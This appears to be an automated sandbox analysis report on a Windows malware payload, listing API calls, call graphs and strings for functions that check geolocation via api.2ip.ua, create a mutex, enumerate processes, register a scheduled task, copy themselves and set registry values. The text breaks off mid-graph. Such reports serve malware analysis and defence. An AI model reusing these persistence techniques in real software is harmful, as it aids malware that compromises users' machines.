API calls 3 library calls 39258->39262 39261->38629 39261->38630 39263->38944 39266->38958 39267->38958 39271 491570 39268->39271 39274 491580 39271->39274 39272 491586 39282 485208 58 API calls __getptd_noexit 39272->39282 39274->39272 39278 4915ae 39274->39278 39275 49158b 39283 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 39275->39283 39280 4915cf wcstoxl 39278->39280 39284 48e883 GetStringTypeW 39278->39284 39281 47a36e lstrcpyW lstrcpyW 39280->39281 39285 485208 58 API calls __getptd_noexit 39280->39285 39281->38663 39282->39275 39283->39281 39284->39278 39285->39281 39287 471cf2 RegOpenKeyExW 39286->39287 39287->38968 39287->38987 39288->38977 39289->38995 39291 480241 39290->39291 39292 4802b6 39290->39292 39299 480266 39291->39299 39300 485208 58 API calls __getptd_noexit 39291->39300 39302 4802c8 60 API calls 3 library calls 39292->39302 39295 4802c3 39295->39015 39296 48024d 39301 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 39296->39301 39298 480258 39298->39015 39299->39015 39300->39296 39301->39298 39302->39295 39303->39042 39304->39041 39305->39032 39308->39061 39309->39064 39310->39050 39311->39049 39314 483b4c 59 API calls 39313->39314 39315 46b164 39314->39315 39316 46b177 SysAllocString 39315->39316 39317 46b194 39315->39317 39316->39317 39317->39078 39319 46b1de 39318->39319 39321 46b202 39318->39321 39320 46b1f5 SysFreeString 39319->39320 39319->39321 39320->39321 39321->39080 39323 483add __aulldiv 39322->39323 39323->39117 39337 49035d 39324->39337 39326 48355a 39327 46d78f 39326->39327 39345 483576 39326->39345 39329 4828e0 39327->39329 39447 48279f 39329->39447 39333 46b423 39332->39333 39334 46b41d 39332->39334 39335 46b42d VariantClear 39333->39335 39334->39139 39335->39139 39336->39091 39378 48501f 58 API calls 4 library calls 39337->39378 39339 490363 39340 490369 39339->39340 39341 49038d 39339->39341 39343 488cde __malloc_crt 58 API calls 39339->39343 39340->39341 39379 485208 58 API calls __getptd_noexit 39340->39379 39341->39326 39343->39340 39344 49036e 39344->39326 39346 4835a9 _memset 39345->39346 39347 483591 39345->39347 39346->39347 39352 4835c0 39346->39352 39388 485208 58 API calls __getptd_noexit 39347->39388 39349 483596 39389 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 39349->39389 39351 4835e9 39380 48fb64 39351->39380 39352->39351 39353 4835cb 39352->39353 39390 485208 58 API calls __getptd_noexit 39353->39390 39356 4835ee 39391 48f803 58 API calls __stricmp_l 39356->39391 39358 4835f7 39359 4837e5 39358->39359 39392 48f82d 58 API calls __stricmp_l 39358->39392 39405 4842fd 8 API calls 2 library calls 39359->39405 39362 4837ef 39363 483609 39363->39359 39393 48f857 39363->39393 39365 48361b 39365->39359 39366 483624 39365->39366 39367 48369b 39366->39367 39368 483637 39366->39368 39403 48f939 58 API calls 4 library calls 39367->39403 39400 48f939 58 API calls 4 library calls 39368->39400 39370 4836a2 39377 4835a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 39370->39377 39404 48fbb4 58 API calls 4 library calls 39370->39404 39372 48364f 39372->39377 39401 48fbb4 58 API calls 4 library calls 39372->39401 39375 483668 39375->39377 39402 48f939 58 API calls 4 library calls 39375->39402 39377->39327 39378->39339 39379->39344 39381 48fb70 __wfsopen 39380->39381 39382 48fba5 __wfsopen 39381->39382 39383 488af7 __lock 58 API calls 39381->39383 39382->39356 39384 48fb80 39383->39384 39385 48fb93 39384->39385 39406 48fe47 39384->39406 39435 48fbab LeaveCriticalSection _doexit 39385->39435 39388->39349 39389->39377 39390->39377 39391->39358 39392->39363 39394 48f861 39393->39394 39395 48f876 39393->39395 39445 485208 58 API calls __getptd_noexit 39394->39445 39395->39365 39397 48f866 39446 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 39397->39446 39399 48f871 39399->39365 39400->39372 39401->39375 39402->39377 39403->39370 39404->39377 39405->39362 39407 48fe53 __wfsopen 39406->39407 39408 488af7 __lock 58 API calls 39407->39408 39409 48fe71 __tzset_nolock 39408->39409 39410 48f857 __tzset_nolock 58 API calls 39409->39410 39411 48fe86 39410->39411 39426 48ff25 __tzset_nolock __isindst_nolock 39411->39426 39436 48f803 58 API calls __stricmp_l 39411->39436 39414 48fe98 39414->39426 39437 48f82d 58 API calls __stricmp_l 39414->39437 39415 48ff71 GetTimeZoneInformation 39415->39426 39418 48feaa 39418->39426 39438 493f99 58 API calls 2 library calls 39418->39438 39420 48ffd8 WideCharToMultiByte 39420->39426 39421 48feb8 39439 4a1667 78 API calls 3 library calls 39421->39439 39422 490010 WideCharToMultiByte 39422->39426 39425 48ff0c _strlen 39428 488cde __malloc_crt 58 API calls 39425->39428 39426->39415 39426->39420 39426->39422 39427 490157 __wfsopen __tzset_nolock __isindst_nolock 39426->39427 39433 483c2d 61 API calls __tzset_nolock 39426->39433 39434 49ff8e 58 API calls __tzset_nolock 39426->39434 39442 4842fd 8 API calls 2 library calls 39426->39442 39443 480bed 58 API calls 2 library calls 39426->39443 39444 4900d7 LeaveCriticalSection _doexit 39426->39444 39427->39385 39430 48ff1a _strlen 39428->39430 39429 48fed9 __tzset_nolock 39429->39425 39429->39426 39440 480bed 58 API calls 2 library calls 39429->39440 39430->39426 39441 48c0fd 58 API calls __stricmp_l 39430->39441 39433->39426 39434->39426 39435->39382 39436->39414 39437->39418 39438->39421 39439->39429 39440->39425 39441->39426 39442->39426 39443->39426 39444->39426 39445->39397 39446->39399 39474 48019c 39447->39474 39450 4827d4 39482 485208 58 API calls __getptd_noexit 39450->39482 39452 4827d9 39483 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 39452->39483 39453 4827e9 MultiByteToWideChar 39455 482804 GetLastError 39453->39455 39456 482815 39453->39456 39484 4851e7 58 API calls 3 library calls 39455->39484 39458 488cde __malloc_crt 58 API calls 39456->39458 39459 48281d 39458->39459 39460 482825 MultiByteToWideChar 39459->39460 39461 482810 39459->39461 39460->39455 39462 48283f 39460->39462 39487 480bed 58 API calls 2 library calls 39461->39487 39464 488cde __malloc_crt 58 API calls 39462->39464 39466 48284a 39464->39466 39465 4828a0 39488 480bed 58 API calls 2 library calls 39465->39488 39466->39461 39485 48d51e 88 API calls 3 library calls 39466->39485 39468 46d7a3 39468->39122 39470 482866 39470->39461 39471 48286f WideCharToMultiByte 39470->39471 39471->39461 39472 48288b GetLastError 39471->39472 39486 4851e7 58 API calls 3 library calls 39472->39486 39475 4801ad 39474->39475 39479 4801fa 39474->39479 39489 485007 58 API calls 2 library calls 39475->39489 39477 4801b3 39478 4801da 39477->39478 39490 4845dc 58 API calls 6 library calls 39477->39490 39478->39479 39491 48495e 58 API calls 6 library calls 39478->39491 39479->39450 39479->39453 39482->39452 39483->39468 39484->39461 39485->39470 39486->39461 39487->39465 39488->39468 39489->39477 39490->39478 39491->39479 39492->39165 39499 487e1a __wfsopen 39498->39499 39500 488af7 __lock 51 API calls 39499->39500 39501 487e21 39500->39501 39502 487e4f DecodePointer 39501->39502 39505 487eda _doexit 39501->39505 39502->39505 39506 487e66 DecodePointer 39502->39506 39518 487f28 39505->39518 39511 487e76 39506->39511 39507 487f37 __wfsopen 39507->38875 39509 487e83 EncodePointer 39509->39511 39510 487f1f 39512 487b0b _fast_error_exit 3 API calls 39510->39512 39511->39505 39511->39509 39513 487e93 DecodePointer EncodePointer 39511->39513 39514 487f28 39512->39514 39516 487ea5 DecodePointer DecodePointer 39513->39516 39515 487f35 39514->39515 39523 488c81 LeaveCriticalSection 39514->39523 39515->38875 39516->39511 39519 487f2e 39518->39519 39520 487f08 39518->39520 39524 488c81 LeaveCriticalSection 39519->39524 39520->39507 39522 488c81 LeaveCriticalSection 39520->39522 39522->39510 39523->39515 39524->39520

                                                                                                                            Executed Functions

                                                                                                                            Function 00479F90 Relevance: 174.8, APIs: 65, Strings: 34, Instructions: 1565COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0046CF10: _memset.LIBCMT ref: 0046CF4A
                                                                                                                              • Part of subcall function 0046CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0046CF5F
                                                                                                                              • Part of subcall function 0046CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0046CFA6
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00479FC4
                                                                                                                            • GetLastError.KERNEL32 ref: 00479FD2
                                                                                                                            • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00479FDA
                                                                                                                            • GetLastError.KERNEL32 ref: 00479FE4
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,00AB3A68,?), ref: 0047A0BB
                                                                                                                            • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0047A0C2
                                                                                                                            • GetCommandLineW.KERNEL32(?,?), ref: 0047A161
                                                                                                                              • Part of subcall function 004724E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004724FE
                                                                                                                              • Part of subcall function 004724E0: GetLastError.KERNEL32 ref: 00472509
                                                                                                                              • Part of subcall function 004724E0: CloseHandle.KERNEL32 ref: 0047251C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                                            • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1V$list<T> too long$x*V$x2W${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7V
                                                                                                                            • API String ID: 2957410896-3258308135
                                                                                                                            • Opcode ID: 9faf03cd185ae88d214e2cefc62c984819643ff879d2467a6a216f57d7a256d3
                                                                                                                            • Instruction ID: 48c03d4a3856c862ba0d6869a8837064167bef53de054655856ab1d5f035bafb
                                                                                                                            • Opcode Fuzzy Hash: 9faf03cd185ae88d214e2cefc62c984819643ff879d2467a6a216f57d7a256d3
                                                                                                                            • Instruction Fuzzy Hash: EDD2E470504341ABD724EF25C845BDF7BE4BF91308F00891EF48987292EB799A19DB9B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046D240 Relevance: 58.5, APIs: 25, Strings: 8, Instructions: 702comCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 688 46d240-46d274 CoInitialize 689 46d276-46d278 688->689 690 46d27d-46d2dd CoInitializeSecurity call 474690 CoCreateInstance 688->690 691 46da8e-46da92 689->691 697 46d2e3-46d3ca VariantInit * 4 VariantClear * 4 690->697 698 46da3c-46da44 CoUninitialize 690->698 693 46da94-46da9c call 482587 691->693 694 46da9f-46dab1 691->694 693->694 705 46d3e2-46d3fe call 46b140 697->705 706 46d3cc-46d3dd CoUninitialize 697->706 700 46da69-46da6d 698->700 702 46da6f-46da77 call 482587 700->702 703 46da7a-46da8a 700->703 702->703 703->691 711 46d404 705->711 712 46d400-46d402 705->712 706->700 713 46d406-46d424 call 46b1d0 711->713 712->713 717 46d426-46d437 CoUninitialize 713->717 718 46d43c-46d451 call 46b140 713->718 717->700 722 46d457 718->722 723 46d453-46d455 718->723 724 46d459-46d494 call 46b1d0 722->724 723->724 730 46d496-46d4a7 CoUninitialize 724->730 731 46d4ac-46d4c2 724->731 730->700 734 46da2a-46da37 731->734 735 46d4c8-46d4dd call 46b140 731->735 734->698 739 46d4e3 735->739 740 46d4df-46d4e1 735->740 741 46d4e5-46d508 call 46b1d0 739->741 740->741 741->734 746 46d50e-46d524 741->746 746->734 748 46d52a-46d542 746->748 748->734 751 46d548-46d55e 748->751 751->734 753 46d564-46d57c 751->753 753->734 756 46d582-46d59b 753->756 756->734 758 46d5a1-46d5b6 call 46b140 756->758 761 46d5bc 758->761 762 46d5b8-46d5ba 758->762 763 46d5be-46d5e1 call 46b1d0 761->763 762->763 763->734 768 46d5e7-46d5fd 763->768 768->734 770 46d603-46d626 768->770 770->734 773 46d62c-46d651 770->773 773->734 776 46d657-46d666 773->776 776->734 778 46d66c-46d681 call 46b140 776->778 781 46d687 778->781 782 46d683-46d685 778->782 783 46d689-46d6a3 call 46b1d0 781->783 782->783 783->734 787 46d6a9-46d6be call 46b140 783->787 790 46d6c4 787->790 791 46d6c0-46d6c2 787->791 792 46d6c6-46d6e0 call 46b1d0 790->792 791->792 792->734 796 46d6e6-46d6f4 792->796 796->734 798 46d6fa-46d70f call 46b140 796->798 801 46d715 798->801 802 46d711-46d713 798->802 803 46d717-46d731 call 46b1d0 801->803 802->803 803->734 807 46d737-46d74c call 46b140 803->807 810 46d752 807->810 811 46d74e-46d750 807->811 812 46d754-46d76e call 46b1d0 810->812 811->812 812->734 816 46d774-46d7ce call 483aaf call 483551 call 4828e0 call 472c40 call 472900 812->816 827 46d7d2-46d7e3 call 46b140 816->827 828 46d7d0 816->828 831 46d7e5-46d7e7 827->831 832 46d7e9 827->832 828->827 833 46d7eb-46d819 call 46b1d0 call 473210 831->833 832->833 833->734 840 46d81f-46d835 833->840 840->734 842 46d83b-46d85e 840->842 842->734 845 46d864-46d889 842->845 845->734 848 46d88f-46d8ab call 46b140 845->848 851 46d8b1 848->851 852 46d8ad-46d8af 848->852 853 46d8b3-46d8cd call 46b1d0 851->853 852->853 857 46d8cf-46d8d8 853->857 858 46d8dd-46d8f2 call 46b140 853->858 857->734 862 46d8f4-46d8f6 858->862 863 46d8f8 858->863 864 46d8fa-46d91d call 46b1d0 862->864 863->864 864->734 869 46d923-46d98d call 46b400 VariantInit * 2 call 46b140 864->869 874 46d993 869->874 875 46d98f-46d991 869->875 876 46d995-46da0e call 46b1d0 VariantClear * 3 874->876 875->876 880 46da46-46da67 CoUninitialize 876->880 881 46da10-46da27 call 48052a 876->881 880->700 881->734
                                                                                                                            APIs
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 0046D26C
                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0046D28F
                                                                                                                            • CoCreateInstance.OLE32(0053506C,00000000,00000001,00534FEC,?,?,00000000,000000FF), ref: 0046D2D5
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0046D2F0
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0046D309
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0046D322
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0046D33B
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0046D397
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0046D3A4
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0046D3B1
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0046D3C2
                                                                                                                            • CoUninitialize.OLE32 ref: 0046D3D5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                                            • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                                            • API String ID: 2496729271-1738591096
                                                                                                                            • Opcode ID: 948338f76f259f8bf93fb4b392236aba06ec26a455e620ba0f9e3a49e74cfd62
                                                                                                                            • Instruction ID: 37aa648fc3d232e7746c5c1b5da7931a9f3c2bfbc162019e14d9173ef1701682
                                                                                                                            • Opcode Fuzzy Hash: 948338f76f259f8bf93fb4b392236aba06ec26a455e620ba0f9e3a49e74cfd62
                                                                                                                            • Instruction Fuzzy Hash: 4B527F70E00219DFDB10DFA5C848FAEBBB5FF49304F148199E505AB251EB34AD46CBA6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00472220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetCommandLineW.KERNEL32 ref: 00472235
                                                                                                                            • CommandLineToArgvW.SHELL32(00000000,?), ref: 00472240
                                                                                                                            • PathFindFileNameW.SHLWAPI(00000000), ref: 00472248
                                                                                                                            • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00472256
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0047226A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00472275
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00472280
                                                                                                                            • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00472291
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0047229F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004722AA
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004722B5
                                                                                                                            • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004722CD
                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004722FE
                                                                                                                            • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00472315
                                                                                                                            • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0047232C
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00472347
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                                            • API String ID: 3668891214-3807497772
                                                                                                                            • Opcode ID: 2656100bc6066429cacfda1697eab721c899b79fd40737a213d1aebb886953ec
                                                                                                                            • Instruction ID: 221d24195813059d9f7e054a1b11b0153e51f2007fe3ad0ab9dcd21e75ba10bc
                                                                                                                            • Opcode Fuzzy Hash: 2656100bc6066429cacfda1697eab721c899b79fd40737a213d1aebb886953ec
                                                                                                                            • Instruction Fuzzy Hash: 26315271E00219ABDB10AFA58C45EEFBBB8FF55705F00446AF904E3250EBB49E059FA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046CF10 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 228networkfileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 903 46cf10-46cfb0 call 48f7c0 call 48b420 InternetOpenW call 475c10 InternetOpenUrlW 910 46cfb2-46cfb4 903->910 911 46cfb9-46cffb InternetReadFile InternetCloseHandle * 2 call 4756d0 903->911 912 46d213-46d217 910->912 916 46d000-46d01d 911->916 914 46d224-46d236 912->914 915 46d219-46d221 call 482587 912->915 915->914 918 46d023-46d02c 916->918 919 46d01f-46d021 916->919 922 46d030-46d035 918->922 921 46d039-46d069 call 4756d0 call 474300 919->921 928 46d06f-46d08b call 473010 921->928 929 46d1cb 921->929 922->922 924 46d037 922->924 924->921 935 46d08d-46d091 928->935 936 46d0b9-46d0bd 928->936 931 46d1cd-46d1d1 929->931 933 46d1d3-46d1db call 482587 931->933 934 46d1de-46d1f4 931->934 933->934 938 46d1f6-46d1fe call 482587 934->938 939 46d201-46d20f 934->939 941 46d093-46d09b call 482587 935->941 942 46d09e-46d0b4 call 473d40 935->942 944 46d0bf-46d0ca call 482587 936->944 945 46d0cd-46d0e1 call 474300 936->945 938->939 939->912 941->942 942->936 944->945 945->929 954 46d0e7-46d149 call 473010 945->954 957 46d150-46d15a 954->957 958 46d160-46d162 957->958 959 46d15c-46d15e 957->959 961 46d165-46d16a 958->961 960 46d16e-46d18b call 46b650 959->960 965 46d18d-46d18f 960->965 966 46d19a-46d19e 960->966 961->961 962 46d16c 961->962 962->960 965->966 967 46d191-46d198 965->967 966->957 968 46d1a0 966->968 967->966 969 46d1c7-46d1c9 967->969 970 46d1a2-46d1a6 968->970 969->970 971 46d1b3-46d1c5 970->971 972 46d1a8-46d1b0 call 482587 970->972 971->931 972->971
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0046CF4A
                                                                                                                            • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0046CF5F
                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0046CFA6
                                                                                                                            • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0046CFCD
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0046CFDA
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0046CFDD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                                            • String ID: $"country_code":"$$$($Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                                            • API String ID: 1485416377-933853286
                                                                                                                            • Opcode ID: b37e613185fdaf336fd1cc1c06fb724c7df7957baad608be6254c22768effed2
                                                                                                                            • Instruction ID: c14736529394499541c8d56160f7d7a3784d11cf2b20a6b4a897974c3928d28a
                                                                                                                            • Opcode Fuzzy Hash: b37e613185fdaf336fd1cc1c06fb724c7df7957baad608be6254c22768effed2
                                                                                                                            • Instruction Fuzzy Hash: E591C371D00248EBEF20DFA0CD45BEEBBB4BF15708F20455AE4057B281E7BA5A49CB56
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00471CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382stringregistrylibraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 606 471cd0-471d1a call 48f7c0 RegOpenKeyExW 609 472207-472216 606->609 610 471d20-471d8d call 48b420 RegQueryValueExW RegCloseKey 606->610 613 471d93-471d9c 610->613 614 471d8f-471d91 610->614 616 471da0-471da9 613->616 615 471daf-471dcb call 475c10 614->615 620 471dd1-471df8 lstrlenA call 473520 615->620 621 471e7c-471e87 615->621 616->616 617 471dab-471dad 616->617 617->615 628 471dfa-471dfe 620->628 629 471e28-471e2c 620->629 623 471e94-471f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 621->623 624 471e89-471e91 call 482587 621->624 633 471f36-471f38 623->633 634 471f3a-471f3f 623->634 624->623 635 471e00-471e08 call 482587 628->635 636 471e0b-471e23 call 4745a0 628->636 631 471e2e-471e39 call 482587 629->631 632 471e3c-471e50 PathFileExistsW 629->632 631->632 632->621 640 471e52-471e57 632->640 638 471f4f-471f96 call 475c10 RpcStringFreeW PathAppendW CreateDirectoryW 633->638 639 471f40-471f49 634->639 635->636 636->629 653 471fce-471fe9 638->653 654 471f98-471fa0 638->654 639->639 644 471f4b-471f4d 639->644 645 471e6a-471e6e 640->645 646 471e59-471e5e 640->646 644->638 645->609 651 471e74-471e77 645->651 646->645 649 471e60-471e65 call 474690 646->649 649->645 655 4721ff-472204 call 482587 651->655 656 471fef-471ff8 653->656 657 471feb-471fed 653->657 658 471fa6-471faf 654->658 659 471fa2-471fa4 654->659 655->609 662 472000-472009 656->662 661 47200f-472076 call 475c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 657->661 665 471fb0-471fb9 658->665 663 471fbf-471fc9 call 475c10 659->663 671 4721d1-4721d5 661->671 672 47207c-472107 call 48b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 661->672 662->662 666 47200b-47200d 662->666 663->653 665->665 668 471fbb-471fbd 665->668 666->661 668->663 673 4721d7-4721df call 482587 671->673 674 4721e2-4721fa 671->674 680 472115-4721a8 call 48b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 672->680 681 472109-472110 call 473260 672->681 673->674 674->609 677 4721fc 674->677 677->655 685 